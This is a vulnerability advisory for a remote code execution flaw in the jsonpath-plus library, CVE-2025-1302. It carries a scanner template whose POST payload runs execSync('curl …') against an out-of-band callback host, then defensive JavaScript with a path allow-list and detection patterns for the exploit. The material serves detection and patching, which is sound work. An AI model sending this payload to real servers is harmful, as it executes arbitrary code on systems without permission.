Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534]

PoC code [public]
```yaml
id: CVE-2025-1302

info:
  name: JSONPath Plus < 10.3.0 - Remote Code Execution
  author: Jaenact
  severity: critical
  description: |
    Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534]
  impact: |
    Attackers can execute arbitrary code on the system, potentially leading to full system compromise.
  remediation: |
    Update to version 10.3.0 or later.
  reference:
    - https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585
    - https://github.com/JSONPath-Plus/JSONPath
    - https://github.com/EQSTLab/CVE-2025-1302
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1302
    - https://gist.github.com/nickcopi/11ba3cb4fdee6f89e02e6afae8db6456
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-1302
    cwe-id: CWE-94
    epss-score: 0.86146
    epss-percentile: 0.99354
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,rce,jsonpath

http:
  - method: POST
    path:
      - "{{BaseURL}}/query"
      - "{{BaseURL}}/jsonpath"
      - "{{BaseURL}}/api/query"
      - "{{BaseURL}}/data"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/filter"
      - "{{BaseURL}}/expression"
    headers:
      Content-Type: application/json
    body: |
      {
        "path":
          "$..[?(p=\"console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())\";Ethan=''[['constructor']][['constructor']](p);Ethan())]"
      }

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":'

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100fa11caac21b09d224fe41126e598e0487ad8785d469d4a70398cd5fd11ff9b79022100ccc41a7135674d356456b2bf88b1a17267b8984eae4f34738fc915260ac00fd2:922c64590222798bb761d5b6d8e72950
```
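As an added defensive example (not part of the advisory, the template, or the JSONPath-Plus project): a guard an application can place in front of JSONPath-Plus when the `path` field of a request body comes from an untrusted client, as in the request shape the template above probes, plus a scorer for the payload pattern this CVE relies on (reaching the Function constructor through `''['constructor']['constructor']`, then `process`/`require`). It assumes the application never needs client-supplied filter or script expressions, so any `[?(` or `[(` is rejected outright instead of trusting `eval: 'safe'`; the request bodies are constructed samples, not real traffic.

```javascript
// Filter expressions [?(...)] and script expressions [(...)] are the only
// JSONPath constructs jsonpath-plus evaluates as code. Reject them wholesale.
const SCRIPT_EXPR = /\[\s*\??\s*\(/;

// Markers of the exploit shape: constructor chaining to reach Function, then
// the Node process object, require(), and child_process execution.
const SUSPICIOUS = [
  /constructor/i,
  /\bprocess\b/,
  /mainModule/,
  /\brequire\s*\(/,
  /child_process/,
  /execSync|exec\s*\(|spawn/,
];

// Allow-list grammar: $, member access, wildcard, recursive descent, slices,
// and unions of integers or quoted names. Parentheses, ';' and '=' never pass.
const SAFE_PATH =
  /^\$(\.\.?(\*|[A-Za-z_][\w-]*)|\[(\*|-?\d*(:-?\d*){0,2}|'[^']*'|"[^"]*")(,\s*(-?\d+|'[^']*'|"[^"]*"))*\])*$/;

function isSafeJsonPath(path) {
  if (typeof path !== 'string' || path.length === 0 || path.length > 512) return false;
  if (SCRIPT_EXPR.test(path)) return false;
  return SAFE_PATH.test(path);
}

// Number of exploit markers present; two or more is worth an alert, not just a 400.
function suspicionScore(path) {
  return SUSPICIOUS.filter((re) => re.test(String(path))).length;
}

// Constructed sample request bodies (hypothetical, not captured traffic).
const samples = [
  { path: '$.store.book[*].author' },                       // benign
  { path: '$..book[?(@.price < 10)]' },                      // legitimate filter, still rejected by policy
  { path: "$..[?(p=\"this.process.mainModule.require('child_process')\";f=''[['constructor']][['constructor']](p);f())]" },
];

// Decide before the path ever reaches JSONPath(): allow, reject, or reject and alert.
function triage(body) {
  const path = body && body.path;
  const safe = isSafeJsonPath(path);
  const score = suspicionScore(path);
  const verdict = score >= 2 ? 'block-and-alert' : safe ? 'allow' : 'reject';
  return { safe, score, verdict };
}

samples.forEach((b) => console.log(JSON.stringify(triage(b))));
```

Pair the guard with JSONPath-Plus's `eval: false` option where evaluation is not needed, and upgrade to 10.3.0 or later regardless; the guard only limits exposure of paths taken from clients.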